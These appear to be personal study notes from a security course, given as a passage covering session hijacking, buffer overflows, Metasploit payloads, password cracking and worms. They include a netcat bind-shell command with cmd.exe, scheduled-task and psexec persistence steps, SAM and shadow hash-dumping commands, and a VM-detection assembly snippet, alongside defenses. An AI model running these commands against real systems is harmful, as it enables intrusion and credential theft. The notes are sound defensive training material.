machines, hard-coding the MAC address to IP address mapping for all systems on the LAN. Takes
extra overhead when changing NIC components.
Identification
 On the suspect Unix machine, ifconfig  the word PROMISC is there, it is listening
 On Windows, use PromiscDetect, another free tool at
http://ntsecurity.nu/toolbox/promiscdetect
 To detect from Remote, use Sentinal that tests using EtherARP, EtherPing and DNS tests
to identify.
o EtherARP – send a ARP Req to suspect IP with bogus MAC, if Response received it
is listening
o EtherPING – same as ARP, but it uses ICMP ping. If it doesn’t sniff it should not
see ping.
o DNS Test – Send a DNS req, and check if any othermachine doing Reverse DNS of
that website
Containment
If detected on one machine, it can be present on another machine
Eradication
Check for Rootkits and identify the process that is listening in promiscuous mode
Recovery
Monitor the attacker activity, as he is likely to use the information gathered by sniffing
Day 3 Session 2
Session Hijacking
Tools:
o
o
o
o
o
Hunt
Dsniff --- sshmitm
Ettercap
Juggernaut
IP Watcher, TTYWatcher, TTYSnoop
 Network-based session hijacking
o Combines spoofing and sniffing
o Alice and Bob have existing connection
o Trudy is sniffing packets (on LAN)
o Trudy starts injecting packets
o Bob thinks packets came from Alice
 This works even if strong authentication used, provided there is no encryption
ACK Storm
ACK Storm can be avoided using Ettercap and Eve becoming Man in the Middle by ARP Poisoning.
Now Eve sniffs the packets destined for DD.DD… and Replay to BOB.
Whenever packets actually travel between Alice and Bob, Ettercap will "fix" the sequence number on
those packets before forwarding them on. Alice and Bob don't notice any discontinuity in the sequence
number stream, so no ACK storm results.
If Eve is far from Alic and Bob, Eve has to ARP Poison the routers/switches in between Eve and Alice, Eve
and Bob.
Defense
Encrypted sessions prevent session hijacking because the attackers will not have the keys to encrypt or
decrypt information. Therefore, an attacker cannot inject meaningful traffic into a session.
Use all defenses that apply for Sniffing and Spoofing
Identification
Users might report that they lose sessions
Error messages from ssh that server keys are changed
Erradication
Check for rootkit and change the passwords
DNS Cache Poisoning
>> Search <<
Bufferover flows
SANS_3B – 50:00
Stack Based Buffer Overflow
This can be exploited when input sanitization and
input checking is not performed on the
Application.
When a function call is made, The execution stops
and the address is stored on stack so as to resume
after completing the calling function.[Return PTR]
Current State of Registers is stored as Saved
Frame PTR
In the Function Program memory for the variables
are allocated and stored in the Stack Buffer.
Suppose Input is more than what variable can
hold, the input data overflows and overwrites the
Return PTR.
Now when function completed and original
program is resumed, It loads the value in Return
PTR which is Overwritten due to malicious input.
Usually the value in Return Ptr is loaded with the address in Stack which hold Malicious Shell Code
Culprit: Input Bound Checking
1. Identify the buffer size, exactly speaking identify the location of EIP
Input a pattern of input which is so long, when the application crashes, look into technical
information – if the segmentation fault caused to trying to access a location which is the input
sequence we have applied, like wise identify the location of EIP. [Bruteforce Fuzzing]
2. Exploit is tailored to operating system and architecture
3. If the exploit it large so that it do not fit into, then split the exploit.
Eg:, part of the exploit is one field, and remaining in another field. After overflow of one field, in
shell code put a JMP to the code in another field.
4. One more method is Staged Loading: A small exploit is running, one came to end of the code it
fetches next exploit data and load into same space and run again.
5. If you are not sure the exact location of exploit code, Use NOP NOP NOP NOP <EXPLOIT>. Now
even the return pointer goes to NOP, it will follow and finally runs the Exploit.
Sploit
MetaSploit
Exploit: It is it that triggers the condition so that we can execute the code
Payload: The actual code that executes, it can be a machine code of Shell, some command to add
another user etc
It has an arsenal of exploits.
Metasploit offers a huge set of payloads, that is, the code the attacker wants to run on the target
machine, triggered by the exploit itself. An attacker using Metasploit can choose from any of the
following payloads to foist on a target:

Bind shell to current port. This payload opens a command shell listener on the target machine
using the existing TCP connection of a service on the machine. The attacker can then feed
commands to the victim system across the network to execute at a command prompt.

Bind shell to arbitrary port. This payload opens a command shell listener on any TCP port of the
attacker's choosing on the target system.

Reverse shell. This payload shovels a shell back to the attacker on a TCP port. With this
capability, the attacker can force the victim machine to initiate an outbound connection, sent to
the attacker, polling the bad guy for commands to be executed on the victim machine. So, if a
network or host-based firewall blocks inbound connections to the victim machine, the attacker
can still force an outbound connection from the victim to the attacker, getting commands from
the attacker for the shell to execute. As we discuss in Chapter 8, Phase 3: Gaining Access Using
Network Attacks, the attacker will likely have a Netcat listener waiting to receive the shoveled
shell.

Windows VNC Server DLL Inject. This payload allows the attacker to control the GUI of the
victim machine remotely, using the Virtual Network Computing (VNC) tool sent as a payload.
VNC runs inside the victim process, so it doesn't need to be installed on the victim machine in
advance. Instead, it is inserted as a DLL inside the vulnerable program to give the attacker
remote control of the machine's screen and keyboard.

Reverse VNC DLL Inject. This payload inserts VNC as a DLL inside the running process, and then
tells the VNC server to make a connection back to the attacker's machine, in effect shoveling the
GUI to the attacker. That way, the victim machine initiates an outbound connection to the
attacker, but allows the attacker to control the victim machine.

Inject DLL into running application. This payload injects an arbitrary DLL of the attacker's
choosing into the vulnerable process, and creates a thread to run inside that DLL. Thus, the
attacker can make any blob of code packaged as a DLL run on the victim.

Create Local Admin User. This payload creates a new user in the administrators group with a
name and password specified by the attacker

The Meterpreter. This general-purpose payload carries a very special DLL to the target box. This
DLL implements a simple shell, called the Metasploit Interpreter
o
It does not create a new process, just runs inside the vulnerable app No Detection.
o
It doesn’t touch hard drive  No Evidence
o
Although vulnerable application has limited access restrictions, Meterpreters commands
have full previlegies  Great control to Attacker
PRIV is an extension that is injected which has bunch of privilege escalation attacks, that can
cause privilege escalation, so that even the user with limited privileges is exploited, attacker can
run commands with admin privileges.
Meterpreter 3

Polymorphic Code –used to avoid detection of signatures by AV
o
XOR – the exploit code with a key
o
Randomized No OP Generator – Use the functional equivalents of code that does
nothing e.g: multiplying AH with 1, Adding 0 to CX etc., at various places of exploit code
to evade detection
Exercise:
1. Most Machines have TFTP Client on it. So exploit the target machine and get a little shell on it.
2. On shell, execute Get NetCat using TFTP.
3. Use Firewalk to identify which packets are allowed and use corresponding mechanism to
transfer files. [some firewalls block outgoing tftp port, then use ftp, if not use ssh]
4. Use Binding the shell or Reverse Shell to take control
Defending
 Apply Patches
 Use HIPS
o
They observe syscalls
o
Look into memory – look for strange jumps
 Non Executable Stacks
o
On Windows, uses DEP (Data Execution Prevention)
o
On Solaris, By default
o
On Linux, there are patches by “Solar Designer”
Attacker: Ok.. No Problem..i will use functions which are in libc, ntdll.dll to workout malicious
activity… I am just using those functional components which are necessary and allowed under
application. – Return to glibc, Return to NTDll
 Use StackShield: Stack Shield is a tool for adding protection to programs from this kind of
attacks at compile time whitout changing a line of code. Stack Shield uses a more secure
protection system than other tool like Immunix Stack Guard. Stack Shield is designed to support
the GCC under a Linux Intel 386 class platform.
 Avoid Programming Errors
 Use Static Code Analysis Tools
Parser Vulnerabilities
IDS/IPS parses the datapackets to analyze and proceed through. There are some maliciously crafted
packets which when parsed by IDS/IPS causes buffer overflow and thus causes IDS to blind. I.e., to the
management it shows No suspicious packets (but actually not detecting it)
FileParsers are also causes bufferoverflow when opened a maliciously crafted file. Eg., when you open a
JPEG file, it executes malicious code.
Format String Attacks
C:\Mahesh\Tools\NetCat>sort %x%x%x
7c812fd900The system cannot find the file specified.
7c812fd900 is the value on the stack.

%x reads and prints 4 bytes from stack
o

this may leak sensitive data
%n writes the number of characters printed so far onto the stack
o
this allow stack overflow attacks...

C format strings break the “don’t mix data & code” principle.

Easy to spot & fix:
o
replace printf(str) by printf(“%s”, str)
>>>Checkout formatflaw.c<<<
>>>Some Exercises in last 20 mins<<<
Day 4
User Input Sanitization is the major culprit of these attacks such as buffer overlow, format sting attacks,
sql injections etc., If the application is prone to such attacks, Attacker can inject a command shell to
carry out further attacks.
Eg: Exploiting Unicode Vulnerability in Windows IIS
Password cracking
Password Crack resources: http://www.skullsecurity.org/wiki/index.php/Passwords
Default Passwords: http://www.phenoelit-us.org/dpl/dpl.html
Password Guessing:
Hydra: http://freeworld.thc.org/thc-hydra/
It supports many protocols Telnet, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL,
MYSQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, and
Cisco AAA
#hydra –l <user> -P <passworddictionary> -v <target> <protocol>
In the above it is bruteforcing 192.168.0.112 for user ftp with the list of passwords stored in
passwords.txt




It is time-consuming and resource intensive
They generate IDS Alerts
Usually machines are configured to Account Lockouts after multiple login failures
It can also be used as DOS Attack
Password Cracking:
Passwords are stored in either encrypted form or Hash (or Message Digest) on the machine that is used
to authenticate the user before logging in.
Hybrid Password Cracking- the password-cracking tool starts guessing passwords using a dictionary
term. Then, it creates other guesses by appending or prepending characters to the dictionary term. By
methodically adding characters to words in a brute-force fashion.
Password Cracking for a botnet owner would be faily easy and simple.

Cain, a fantastic free tool available from Massimiliano Montoro at www.oxid.it/cain.html

John the Ripper, a powerful free password cracker for UNIX/Linux and some Windows
passwords, written by Solar Designer, available at www.openwall.com/john

Pandora, a tool for testing Novell Netware, including password cracking, written by Simple
Nomad, and available at www.nmrc.org/project/pandora

LC5, the latest incarnation of the venerable L0phtCrack password cracker, an easy-to-use but
rather expensive commercial password cracker at www.atstake.com/products/lc/purchase.html
CAIN:
Its not just password cracker, it is a multitude of tools.




WLAN discovery like Netstumbler
Identify if the target is sniffing packets
Network Discovery
Captures intresting Packets on network containing user ids etc
 A tool to dump and reveal all encrypted or hashed passwords cached on the local
machine, including the standard Windows LM and NT password representations, as well
as the application-specific passwords for Microsoft Outlook, Outlook Express, Outlook
Express Identities, Outlook 2002, Microsoft Internet Explorer, and MSN Explorer.
 An ARP cache poisoning tool, which can be used to redirect traffic on a LAN so that an attacker
can more easily sniff in a switched environment
 A remote command shell, rather like the backdoor command shells
 A remote route table manager, so an administrator can tweak the packet routing rules on a
Windows machine.
 A remote TCP/UDP port viewer that lists local ports listening on the system running Abel, rather
like the Active Ports and TCPView tools.
 A remote Windows password hash dumper, which an attacker can use to retrieve the
encrypted and hashed Windows password representations from the Security Accounts Manager
(SAM)
Password Cracking On Windows
1. Retreive the LM Hash and NTLM Hash from SAM Database
2. Use Cain to crack it.
Retreiving Hashes
C:\Windows\repair\sam._
[original SAM file cannot be opened/copied]
Cain can retrieve LM / NTLM Hashes from Challenged Packets on network.
 whenever anyone authenticates to the domain or tries to access a share, the attacker can
run Cain in sniffing mode to snag user authentication information from the network.
 So attacker can entice the victim to make such authentication eg: sending a mail to open a
shared drive which needs authentication etc.,
It also supports Rainbow Tables.
Rainbow Tables - A rainbow table is a lookup table of pre computed hashes that can be matched
with hash that needs to be cracked. It helps recovering plaintext passwords.
Salts make it difficult to crack using Rainbow tables. Usually they are 64 bit in most systems.
Unfortunately salt not used for windows NTLM hashes.
Samdump2
To retrieve these hashes from a windows machine, Boot from a Linux and mount the C:\ and dump the
SAM Database.
[root@~]#samdump2 /mnt/CPrimary/Windows/system32/config/SYSTEM /
mnt/CPrimary/Windows/system32/config/SAM > samdb.txt
NOTE: SYSTEM should be dumped prior to dumping SAM, since if syskey is enabled, the SAM db is
encrypted and it is stored in SYSTEM hive.
John The Ripper
A superb professional password cracking tool
On Linux,
Retriving Hashes
/etc/passwd
In some linuxes, Hashes are stored in /etc/shadow (or /etc/secure)
#./unshadow <passwd file> <shadow file> > output.txt
To grab a copy of a shadow password file, an attacker must find a root-level exploit, such as a
buffer overflow of program that runs as root or a related technique, to gain root access. After
achieving root-level access, the attacker makes a copy of the shadow password file to crack.
Defenses:
 Strong Password Policy
o
Use alpha numeric, case, numbers
o
Password Expiry after 30,60 or 90 days
o
Use Password Filtering Softwares on the AD Server during account creation and
password modification

Password Guardian, a commercial tool www.georgiasoftworks.com

Strongpass, a free tool http://ntsecurity.nu/toolbox
 User Awareness
 Where Possible, Use Authentication Tools Other Than Passwords
o
Use RSA Tokens, Biometric access
 Protect Hashes
o
On Linux, active Password Shadowing. I.e., use /etc/shadow files which can be accessed
only by root
o
On Windows, Disable LM Authentication
Define HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
o
Delete %systemroot%\repair\sam._
Exercise
1) create various accounts
2) combine password copy and shadow copy and retrieve
3) Look at john the ripper Password.lst
4) delete the accounts
5) shread the files, which will replace with 0s and 1s so that they are
removed from harddisk blocks.
----------------- break ----------------------
Shell Access On Windows
Scenerio: Attacker has an accound created on victim and use remote connection to open C$ of vitims
machine.
Now Attacker copies netcat on to the victims machine
Now attacker runs Z:\>nc –l –p 1545 –e cmd.exe [Z: on attacker machine is C:\ on vitims machine]
Result: Attacker created a netcat lister on himself :P LOL…..
1. Connect to remote machine with administrative session
2. Copy netcat and a Batch file that run Netcat which listens on to target machine.
3. Configure Task Scheduler to run the Batch file
at \\computername time /interactive | /every:date,... /next:date,... command
at \\computername id /delete | /delete/yes
This will run netcat.bat everyday at 4:02 PM on the victim machine with SYSTEM Privileges.
Now Netcat is listening on the victim machine.
Alternately,
3. psexec from sysinternals is used to run executable on remote machines
Z:\>psexec \\victimmachine –c netcat.bat
Z:\>psexec \\victimmachine netcat.bat
[copy the files]
[Run the batch file]
Run Regedit interactively in the System account to view the contents of the SAM and SECURITY keys::
psexec -i -d -s c:\windows\regedit.exe
PSEXEC did not work out due to BlackIce which has blocked on the victim Machine.
Defences
 Do not let attacker get Admin access to the machine
 Harden the ports
 net session shows up what sessions are present on the machine
 net start shows what services are running
 Disable Scheduling if not required.
Containment
 Check the schedule tasks and delete it.
 Kill the services/process that are listening
Erradication
 Identify the process and remove It
 Check for Rootkits, If present rebuild the machine
Recovery
Harden the machine based on preparation
WORM
A self replicating code that spreads across network.
Each instance is called segment.
They use vulnerabilities in applications, operating systems to spread across.
Eg: Blaster worm uses buffer overflow vulnerability ins MS-RPC Dcom.
From 2005, They started carrying bots which raise in botnets.
Multi Exploits – Nimda worms have 12 to 15 multiple exploits (multiple ways) to break into the machine.
Polymorphic worms – It recodes itself when it re-infects another machine to evade detection.
1. Encrypt the Original code of worm with Random Key (a simple XOR)
2. Generate short Decryptor for Key (PD)
3. This operation is done by Polymorphic Engine(PE) which is included with worm’s code.
Open source Toolkit to Mutate Exploits – ADMMutate, CLET, and JempiScodes.
They can place a Trojan, Backdoors which made raise of Botnet.
Metamorphic Worms – It changes its functionality. It might download from C&C.
Defences
 Bufferover flow protection
 Process for Rapid Patching
 Use HIDS, NIDS. Also Contact Network Management Personnel to identify Chokepoints at
various places inside organization where you can place Filters.
 Encrypt your desktops, laptop with softwares like PointSec,so that even if bot gets in, it will not
play with the data.
Propagation: Emails, Browser exploits, Drive by downloads
Mechanism for Botnet controls:
 IRC from Command & Control Server – Most Popular Mechanism
 Some Bots periodically login to some user on myspace, or some blogs to see the commands
stored in it.
 Distributed P2P communication channels. Commands injected on one bot, remaining bots check
for updates with its neighbor bots and takes the command and spreads thereafter. Now the
problem with single C&C is resolved. Botnet becomes self-aware.
Botnets Detecting Virtual Machines
Since Virtual machines are used to analyse malwares, they detect that they are run in virtual machine
and shuts its malicious activity.
 Check into memory artifacts – file system, Registry, and running process of the machine
 Redpill –
o Executes instruction SIDT, It saves the address of Interrupt Descriptor Tables
o If its running in Original machine, the address is in lower memory (< 0xd0) near
operating system kernel.
o If it is running in VM, the address value is higher
 Scoopy doo – SIDT. SGDT. SLDT
SIDT – Store Interrupt Descriptor Table
SGDT - Store Global Descriptor Table
SLDT – Store Local Descriptor table
o If these values are consistent with virtualization, You are virtualization
 Look for Virtualized Hardware
o Look at MAC, Device Drivers, Interface
 VMDetect – It runs Instructions that only virtual machines executes and it results as invalid
instruction when run on original machine.
 VMware Backdoor I/O Port
Look for change in processor behavior that are associated with communications channel.
Clock synchronization, Copy+paste, Drag Drop etc happens over this COM Channel.
The following operation invokes Backdoor functions:
/* in Intel syntax (MASM and most Windows based assemblers) */
MOV
MOV
MOV
MOV
EAX,
EBX,
CX,
DX,
564D5868h
command-specific-parameter
backdoor-command-number
5658h
IN
EAX, DX (or OUT DX, EAX)
/* magic number
*/
/* VMware I/O Port
*/
/* in AT&T syntax (gnu as and many unix based assemblers)
*/
movl
movl
movw
movw
$0x564D5868, %eax;
command-specific-parameter, %ebx;
backdoor-command-number, %cx;
$0x5658, %dx;
/* magic number
*/
/* VMware I/O port
*/
inl
%dx, %eax; (or outl %eax, %dx)
In appearance it is just a straight forward I/O access operation.
Depending on the command number that was passed to EBX, different operations are carried out.
Source Code ----------http://chitchat.at.infoseek.co.jp/vmware/backdoor.html
Download